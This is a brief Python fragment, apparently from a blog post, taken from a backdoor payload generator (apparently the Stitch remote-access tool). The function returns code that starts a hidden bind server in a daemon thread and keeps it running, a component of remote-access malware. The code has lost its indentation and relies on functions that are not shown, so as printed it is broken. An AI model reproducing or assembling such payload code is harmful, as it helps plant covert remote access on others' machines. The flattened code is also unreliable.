def add_bind_main():
return '''
def main():
if not stitch_running():
st_pyld = stitch_payload()
try:
bind = threading.Thread(target=st_pyld.bind_server, args=())
bind.daemon = True
bind.start()
while True:
sleep(60)
except KeyboardInterrupt:
pass
except Exception as e:
if dbg:
print e
pass
st_pyld.halt_bind_server()
'''
评论列表
文章目录